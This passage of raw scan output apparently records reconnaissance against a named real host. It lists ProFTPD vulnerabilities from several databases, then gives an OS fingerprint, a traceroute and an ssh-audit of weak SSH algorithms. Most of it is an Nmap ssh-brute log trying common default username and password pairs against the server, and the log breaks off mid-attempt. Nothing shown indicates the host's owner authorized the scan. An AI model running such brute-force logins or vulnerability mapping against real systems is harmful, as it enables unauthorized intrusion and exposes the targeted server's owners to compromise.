2361| [862999] Fedora Update for proftpd FEDORA-2011-5040
2362| [862992] Fedora Update for proftpd FEDORA-2011-5033
2363| [862829] Fedora Update for proftpd FEDORA-2011-0613
2364| [862828] Fedora Update for proftpd FEDORA-2011-0610
2365| [862658] Fedora Update for proftpd FEDORA-2010-17091
2366| [862546] Fedora Update for proftpd FEDORA-2010-17220
2367| [862544] Fedora Update for proftpd FEDORA-2010-17098
2368| [861120] Fedora Update for proftpd FEDORA-2007-2613
2369| [831503] Mandriva Update for proftpd MDVSA-2011:181 (proftpd)
2370| [831323] Mandriva Update for proftpd MDVSA-2011:023 (proftpd)
2371| [831242] Mandriva Update for proftpd MDVSA-2010:227 (proftpd)
2372| [830311] Mandriva Update for proftpd MDKSA-2007:130 (proftpd)
2373| [830197] Mandriva Update for proftpd MDKA-2007:089 (proftpd)
2374| [801640] ProFTPD Denial of Service Vulnerability
2375| [801639] ProFTPD Multiple Remote Vulnerabilities
2376| [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
2377| [100933] ProFTPD Backdoor Unauthorized Access Vulnerability
2378| [100316] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2379| [71967] Slackware Advisory SSA:2012-041-04 proftpd
2380| [70586] FreeBSD Ports: proftpd, proftpd-mysql
2381| [70560] Debian Security Advisory DSA 2346-2 (proftpd-dfsg)
2382| [70559] Debian Security Advisory DSA 2346-1 (proftpd-dfsg)
2383| [69584] Slackware Advisory SSA:2011-095-01 proftpd
2384| [69327] Debian Security Advisory DSA 2191-1 (proftpd-dfsg)
2385| [69322] Debian Security Advisory DSA 2185-1 (proftpd-dfsg)
2386| [68801] Slackware Advisory SSA:2010-357-02 proftpd
2387| [68702] FreeBSD Ports: proftpd
2388| [68697] FreeBSD Ports: proftpd
2389| [68466] Slackware Advisory SSA:2010-305-03 proftpd
2390| [66585] Fedora Core 11 FEDORA-2009-13236 (proftpd)
2391| [66583] Fedora Core 12 FEDORA-2009-13250 (proftpd)
2392| [66291] Fedora Core 10 FEDORA-2009-11666 (proftpd)
2393| [66290] Fedora Core 11 FEDORA-2009-11649 (proftpd)
2394| [66205] Debian Security Advisory DSA 1925-1 (proftpd-dfsg)
2395| [66091] Mandrake Security Advisory MDVSA-2009:288 (proftpd)
2396| [64966] Fedora Core 10 FEDORA-2009-9386 (proftpd)
2397| [63630] FreeBSD Ports: proftpd, proftpd-mysql
2398| [63573] Debian Security Advisory DSA 1727-1 (proftpd-dfsg)
2399| [63558] Gentoo Security Advisory GLSA 200903-27 (proftpd)
2400| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
2401| [63128] Fedora Core 8 FEDORA-2009-0195 (proftpd)
2402| [63119] Fedora Core 10 FEDORA-2009-0089 (proftpd)
2403| [63117] Fedora Core 9 FEDORA-2009-0064 (proftpd)
2404| [63061] Debian Security Advisory DSA 1689-1 (proftpd-dfsg)
2405| [61656] FreeBSD Ports: proftpd, proftpd-mysql
2406| [58019] Gentoo Security Advisory GLSA 200702-02 (proftpd)
2407| [57939] Gentoo Security Advisory GLSA 200611-26 (proftpd)
2408| [57786] Debian Security Advisory DSA 1245-1 (proftpd)
2409| [57725] FreeBSD Ports: proftpd, proftpd-mysql
2410| [57703] Slackware Advisory SSA:2006-335-02 proftpd
2411| [57686] Debian Security Advisory DSA 1222-2 (proftpd)
2412| [57683] Debian Security Advisory DSA 1222-1 (proftpd)
2413| [57592] Debian Security Advisory DSA 1218-1 (proftpd)
2414| [57576] FreeBSD Ports: proftpd, proftpd-mysql
2415| [55234] Debian Security Advisory DSA 795-2 (proftpd)
2416| [55007] Gentoo Security Advisory GLSA 200508-02 (proftpd)
2417| [54858] Gentoo Security Advisory GLSA 200502-26 (GProFTPD)
2418| [54569] Gentoo Security Advisory GLSA 200405-09 (proftpd)
2419| [54483] FreeBSD Ports: proftpd, proftpd-mysql
2420| [53882] Slackware Advisory SSA:2003-259-02 ProFTPD Security Advisory
2421| [53794] Debian Security Advisory DSA 032-1 (proftpd)
2422| [53791] Debian Security Advisory DSA 029-1 (proftpd)
2423| [52532] FreeBSD Ports: proftpd
2424| [52464] FreeBSD Ports: proftpd
2425| [15484] proftpd < 1.2.11 remote user enumeration
2426|
2427| SecurityTracker - https://www.securitytracker.com:
2428| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
2429| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
2430| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
2431| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
2432| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
2433| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
2434| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
2435| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
2436| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
2437| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
2438| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
2439| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
2440| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
2441| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
2442|
2443| OSVDB - http://www.osvdb.org:
2444| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
2445| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
2446| [70868] ProFTPD mod_sftp Component SSH Payload DoS
2447| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
2448| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
2449| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
2450| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
2451| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
2452| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
2453| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
2454| [57310] ProFTPD Multiple Unspecified Overflows
2455| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
2456| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
2457| [57307] ProFTPD Multiple Modules Unspecified Overflows
2458| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
2459| [57305] ProFTPD src/main.c Unspecified Overflow
2460| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
2461| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
2462| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
2463| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
2464| [51849] ProFTPD Character Encoding SQL Injection
2465| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
2466| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
2467| [48411] ProFTPD FTP Command Truncation CSRF
2468| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
2469| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
2470| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
2471| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
2472| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
2473| [23063] ProFTPD mod_radius Password Overflow DoS
2474| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
2475| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
2476| [18270] ProFTPD ftpshut Shutdown Message Format String
2477| [14012] GProftpd gprostats Utility Log Parser Remote Format String
2478| [10769] ProFTPD File Transfer Newline Character Overflow
2479| [10768] ProFTPD STAT Command Remote DoS
2480| [10758] ProFTPD Login Timing Account Name Enumeration
2481| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
2482| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
2483| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
2484| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
2485| [7165] ProFTPD USER Command Memory Leak DoS
2486| [5744] ProFTPD CIDR IP Subnet ACL Bypass
2487| [5705] ProFTPD Malformed cwd Command Format String
2488| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
2489| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
2490| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
2491|_
2492Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2493Device type: general purpose
2494Running (JUST GUESSING): Linux 4.X|3.X (90%)
2495OS CPE: cpe:/o:linux:linux_kernel:4.0 cpe:/o:linux:linux_kernel:3.10
2496Aggressive OS guesses: Linux 4.0 (90%), Linux 3.10 (88%), Linux 3.10 - 3.16 (88%), Linux 3.10 - 3.12 (87%), Linux 4.4 (87%), Linux 4.9 (87%)
2497No exact OS matches for host (test conditions non-ideal).
2498Network Distance: 14 hops
2499
2500TRACEROUTE (using port 21/tcp)
2501HOP RTT ADDRESS
25021 129.08 ms 10.245.200.1
25032 ...
25043 129.91 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
25054 129.49 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
25065 136.14 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
25076 153.50 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
25087 162.09 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
25098 162.51 ms be2440.agr21.ams03.atlas.cogentco.com (130.117.50.6)
25109 161.98 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
251110 179.82 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
251211 170.30 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
251312 173.61 ms 62.100.128.107
251413 179.38 ms 62.100.128.115
251514 180.28 ms vps2330-cloud.sd-france.net (92.39.247.11)
2516#######################################################################################################################################
2517# general
2518(gen) banner: SSH-2.0-OpenSSH_7.4
2519(gen) software: OpenSSH 7.4
2520(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
2521(gen) compression: enabled (zlib@openssh.com)
2522
2523# key exchange algorithms
2524(kex) curve25519-sha256 -- [warn] unknown algorithm
2525(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
2526(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
2527 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2528(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
2529 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2530(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
2531 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2532(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2533 `- [info] available since OpenSSH 4.4
2534(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2535(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
2536(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2537 `- [warn] using weak hashing algorithm
2538 `- [info] available since OpenSSH 2.3.0
2539(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2540(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2541 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2542(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2543 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2544 `- [warn] using small 1024-bit modulus
2545 `- [warn] using weak hashing algorithm
2546 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2547
2548# host-key algorithms
2549(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2550(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
2551(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
2552(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
2553 `- [warn] using weak random number generator could reveal the key
2554 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2555(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
2556
2557# encryption algorithms (ciphers)
2558(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
2559 `- [info] default cipher since OpenSSH 6.9.
2560(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2561(enc) aes192-ctr -- [info] available since OpenSSH 3.7
2562(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2563(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
2564(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
2565(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2566 `- [warn] using weak cipher mode
2567 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2568(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2569 `- [warn] using weak cipher mode
2570 `- [info] available since OpenSSH 2.3.0
2571(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2572 `- [warn] using weak cipher mode
2573 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2574(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2575 `- [fail] disabled since Dropbear SSH 0.53
2576 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2577 `- [warn] using weak cipher mode
2578 `- [warn] using small 64-bit block size
2579 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2580(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2581 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2582 `- [warn] using weak cipher mode
2583 `- [warn] using small 64-bit block size
2584 `- [info] available since OpenSSH 2.1.0
2585(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2586 `- [warn] using weak cipher
2587 `- [warn] using weak cipher mode
2588 `- [warn] using small 64-bit block size
2589 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2590
2591# message authentication code algorithms
2592(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
2593 `- [info] available since OpenSSH 6.2
2594(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
2595(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
2596(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
2597(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
2598 `- [info] available since OpenSSH 6.2
2599(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2600 `- [warn] using small 64-bit tag size
2601 `- [info] available since OpenSSH 4.7
2602(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
2603 `- [info] available since OpenSSH 6.2
2604(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2605 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2606(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2607 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2608(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2609 `- [warn] using weak hashing algorithm
2610 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2611
2612# algorithm recommendations (for OpenSSH 7.4)
2613(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2614(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
2615(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
2616(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2617(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2618(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
2619(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
2620(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
2621(rec) -blowfish-cbc -- enc algorithm to remove
2622(rec) -3des-cbc -- enc algorithm to remove
2623(rec) -aes256-cbc -- enc algorithm to remove
2624(rec) -cast128-cbc -- enc algorithm to remove
2625(rec) -aes192-cbc -- enc algorithm to remove
2626(rec) -aes128-cbc -- enc algorithm to remove
2627(rec) -hmac-sha2-512 -- mac algorithm to remove
2628(rec) -umac-128@openssh.com -- mac algorithm to remove
2629(rec) -hmac-sha2-256 -- mac algorithm to remove
2630(rec) -umac-64@openssh.com -- mac algorithm to remove
2631(rec) -hmac-sha1 -- mac algorithm to remove
2632(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
2633(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
2634#######################################################################################################################################
2635Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:39 EST
2636NSE: [ssh-run] Failed to specify credentials and command to run.
2637NSE: [ssh-brute] Trying username/password pair: root:root
2638NSE: [ssh-brute] Trying username/password pair: admin:admin
2639NSE: [ssh-brute] Trying username/password pair: administrator:administrator
2640NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
2641NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
2642NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
2643NSE: [ssh-brute] Trying username/password pair: guest:guest
2644NSE: [ssh-brute] Trying username/password pair: user:user
2645NSE: [ssh-brute] Trying username/password pair: web:web
2646NSE: [ssh-brute] Trying username/password pair: test:test
2647NSE: [ssh-brute] Trying username/password pair: root:
2648NSE: [ssh-brute] Trying username/password pair: admin:
2649NSE: [ssh-brute] Trying username/password pair: administrator:
2650NSE: [ssh-brute] Trying username/password pair: webadmin:
2651NSE: [ssh-brute] Trying username/password pair: sysadmin:
2652NSE: [ssh-brute] Trying username/password pair: netadmin:
2653NSE: [ssh-brute] Trying username/password pair: guest:
2654NSE: [ssh-brute] Trying username/password pair: user:
2655NSE: [ssh-brute] Trying username/password pair: web:
2656NSE: [ssh-brute] Trying username/password pair: test:
2657NSE: [ssh-brute] Trying username/password pair: root:123456
2658NSE: [ssh-brute] Trying username/password pair: admin:123456
2659NSE: [ssh-brute] Trying username/password pair: administrator:123456
2660NSE: [ssh-brute] Trying username/password pair: webadmin:123456
2661NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
2662NSE: [ssh-brute] Trying username/password pair: netadmin:123456
2663NSE: [ssh-brute] Trying username/password pair: guest:123456
2664NSE: [ssh-brute] Trying username/password pair: user:123456
2665NSE: [ssh-brute] Trying username/password pair: web:123456
2666NSE: [ssh-brute] Trying username/password pair: test:123456
2667NSE: [ssh-brute] Trying username/password pair: root:12345
2668NSE: [ssh-brute] Trying username/password pair: admin:12345
2669NSE: [ssh-brute] Trying username/password pair: administrator:12345
2670NSE: [ssh-brute] Trying username/password pair: webadmin:12345
2671NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
2672NSE: [ssh-brute] Trying username/password pair: netadmin:12345
2673NSE: [ssh-brute] Trying username/password pair: guest:12345
2674NSE: [ssh-brute] Trying username/password pair: user:12345
2675NSE: [ssh-brute] Trying username/password pair: web:12345
2676NSE: [ssh-brute] Trying username/password pair: test:12345
2677NSE: [ssh-brute] Trying username/password pair: root:123456789
2678NSE: [ssh-brute] Trying username/password pair: admin:123456789
2679NSE: [ssh-brute] Trying username/password pair: administrator:123456789
2680NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
2681NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
2682NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
2683NSE: [ssh-brute] Trying username/password pair: guest:123456789
2684NSE: [ssh-brute] Trying username/password pair: user:123456789
2685NSE: [ssh-brute] Trying username/password pair: web:123456789
2686NSE: [ssh-brute] Trying username/password pair: test:123456789
2687NSE: [ssh-brute] Trying username/password pair: root:password
2688NSE: [ssh-brute] Trying username/password pair: admin:password
2689NSE: [ssh-brute] Trying username/password pair: administrator:password
2690NSE: [ssh-brute] Trying username/password pair: webadmin:password
2691NSE: [ssh-brute] Trying username/password pair: sysadmin:password
2692NSE: [ssh-brute] Trying username/password pair: netadmin:password
2693NSE: [ssh-brute] Trying username/password pair: guest:password
2694NSE: [ssh-brute] Trying username/password pair: user:password
2695NSE: [ssh-brute] Trying username/password pair: web:password
2696NSE: [ssh-brute] Trying username/password pair: test:password
2697NSE: [ssh-brute] Trying username/password pair: root:iloveyou
2698NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
2699NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
2700NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
2701NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
2702NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
2703NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
2704NSE: [ssh-brute] Trying username/password pair: user:iloveyou
2705NSE: [ssh-brute] Trying username/password pair: web:iloveyou
2706NSE: [ssh-brute] Trying username/password pair: test:iloveyou
2707NSE: [ssh-brute] Trying username/password pair: root:princess
2708NSE: [ssh-brute] Trying username/password pair: admin:princess
2709NSE: [ssh-brute] Trying username/password pair: administrator:princess
2710NSE: [ssh-brute] Trying username/password pair: webadmin:princess
2711NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
2712NSE: [ssh-brute] Trying username/password pair: netadmin:princess
2713NSE: [ssh-brute] Trying username/password pair: guest:princess
2714NSE: [ssh-brute] Trying username/password pair: user:princess
2715NSE: [ssh-brute] Trying username/password pair: web:princess
2716NSE: [ssh-brute] Trying username/password pair: test:princess
2717NSE: [ssh-brute] Trying username/password pair: root:12345678
2718NSE: [ssh-brute] Trying username/password pair: admin:12345678
2719NSE: [ssh-brute] Trying username/password pair: administrator:12345678
2720NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
2721NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
2722NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
2723NSE: [ssh-brute] Trying username/password pair: guest:12345678
2724NSE: [ssh-brute] Trying username/password pair: user:12345678
2725NSE: [ssh-brute] Trying username/password pair: web:12345678
2726NSE: [ssh-brute] Trying username/password pair: test:12345678
2727NSE: [ssh-brute] Trying username/password pair: root:1234567
2728NSE: [ssh-brute] Trying username/password pair: admin:1234567
2729NSE: [ssh-brute] Trying username/password pair: administrator:1234567
2730NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
2731NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
2732NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
2733NSE: [ssh-brute] Trying username/password pair: guest:1234567
2734NSE: [ssh-brute] Trying username/password pair: user:1234567
2735NSE: [ssh-brute] Trying username/password pair: web:1234567
2736NSE: [ssh-brute] Trying username/password pair: test:1234567
2737NSE: [ssh-brute] Trying username/password pair: root:abc123
2738NSE: [ssh-brute] Trying username/password pair: admin:abc123
2739NSE: [ssh-brute] Trying username/password pair: administrator:abc123
2740NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
2741NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
2742NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
2743NSE: [ssh-brute] Trying username/password pair: guest:abc123
2744NSE: [ssh-brute] Trying username/password pair: user:abc123
2745NSE: [ssh-brute] Trying username/password pair: web:abc123
2746NSE: [ssh-brute] Trying username/password pair: test:abc123
2747NSE: [ssh-brute] Trying username/password pair: root:nicole
2748NSE: [ssh-brute] Trying username/password pair: admin:nicole
2749NSE: [ssh-brute] Trying username/password pair: administrator:nicole
2750NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
2751NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
2752NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
2753NSE: [ssh-brute] Trying username/password pair: guest:nicole
2754NSE: [ssh-brute] Trying username/password pair: user:nicole
2755NSE: [ssh-brute] Trying username/password pair: web:nicole
2756NSE: [ssh-brute] Trying username/password pair: test:nicole
2757NSE: [ssh-brute] Trying username/password pair: root:daniel
2758NSE: [ssh-brute] Trying username/password pair: admin:daniel
2759NSE: [ssh-brute] Trying username/password pair: administrator:daniel
2760NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
2761NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
2762NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
2763NSE: [ssh-brute] Trying username/password pair: guest:daniel
2764NSE: [ssh-brute] Trying username/password pair: user:daniel
2765NSE: [ssh-brute] Trying username/password pair: web:daniel
2766NSE: [ssh-brute] Trying username/password pair: test:daniel
2767NSE: [ssh-brute] Trying username/password pair: root:monkey
2768NSE: [ssh-brute] Trying username/password pair: admin:monkey
2769NSE: [ssh-brute] Trying username/password pair: administrator:monkey
2770NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
2771NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
2772NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
2773NSE: [ssh-brute] Trying username/password pair: guest:monkey
2774NSE: [ssh-brute] Trying username/password pair: user:monkey
2775NSE: [ssh-brute] Trying username/password pair: web:monkey
2776NSE: [ssh-brute] Trying username/password pair: test:monkey
2777NSE: [ssh-brute] Trying username/password pair: root:babygirl
2778NSE: [ssh-brute] Trying username/password pair: admin:babygirl
2779NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
2780NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
2781NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
2782NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
2783NSE: [ssh-brute] Trying username/password pair: guest:babygirl
2784NSE: [ssh-brute] Trying username/password pair: user:babygirl
2785NSE: [ssh-brute] Trying username/password pair: web:babygirl
2786NSE: [ssh-brute] Trying username/password pair: test:babygirl
2787NSE: [ssh-brute] Trying username/password pair: root:qwerty
2788NSE: [ssh-brute] Trying username/password pair: admin:qwerty
2789NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
2790NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
2791NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
2792NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
2793NSE: [ssh-brute] Trying username/password pair: guest:qwerty
2794NSE: [ssh-brute] Trying username/password pair: user:qwerty
2795NSE: [ssh-brute] Trying username/password pair: web:qwerty
2796NSE: [ssh-brute] Trying username/password pair: test:qwerty
2797NSE: [ssh-brute] Trying username/password pair: root:lovely
2798NSE: [ssh-brute] Trying username/password pair: admin:lovely
2799NSE: [ssh-brute] Trying username/password pair: administrator:lovely
2800NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
2801NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
2802NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
2803NSE: [ssh-brute] Trying username/password pair: guest:lovely
2804NSE: [ssh-brute] Trying username/password pair: user:lovely
2805NSE: [ssh-brute] Trying username/password pair: web:lovely
2806NSE: [ssh-brute] Trying username/password pair: test:lovely
2807NSE: [ssh-brute] Trying username/password pair: root:654321
2808NSE: [ssh-brute] Trying username/password pair: admin:654321
2809NSE: [ssh-brute] Trying username/password pair: administrator:654321
2810NSE: [ssh-brute] Trying username/password pair: webadmin:654321
2811NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
2812NSE: [ssh-brute] Trying username/password pair: netadmin:654321
2813NSE: [ssh-brute] Trying username/password pair: guest:654321
2814NSE: [ssh-brute] Trying username/password pair: user:654321
2815NSE: [ssh-brute] Trying username/password pair: web:654321
2816NSE: [ssh-brute] Trying username/password pair: test:654321
2817NSE: [ssh-brute] Trying username/password pair: root:michael
2818NSE: [ssh-brute] Trying username/password pair: admin:michael
2819NSE: [ssh-brute] Trying username/password pair: administrator:michael
2820NSE: [ssh-brute] Trying username/password pair: webadmin:michael
2821NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
2822NSE: [ssh-brute] Trying username/password pair: netadmin:michael
2823NSE: [ssh-brute] Trying username/password pair: guest:michael
2824NSE: [ssh-brute] Trying username/password pair: user:michael
2825NSE: [ssh-brute] Trying username/password pair: web:michael
2826NSE: [ssh-brute] Trying username/password pair: test:michael
2827NSE: [ssh-brute] Trying username/password pair: root:jessica
2828NSE: [ssh-brute] Trying username/password pair: admin:jessica
2829NSE: [ssh-brute] Trying username/password pair: administrator:jessica
2830NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
2831NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
2832NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
2833NSE: [ssh-brute] Trying username/password pair: guest:jessica
2834NSE: [ssh-brute] Trying username/password pair: user:jessica
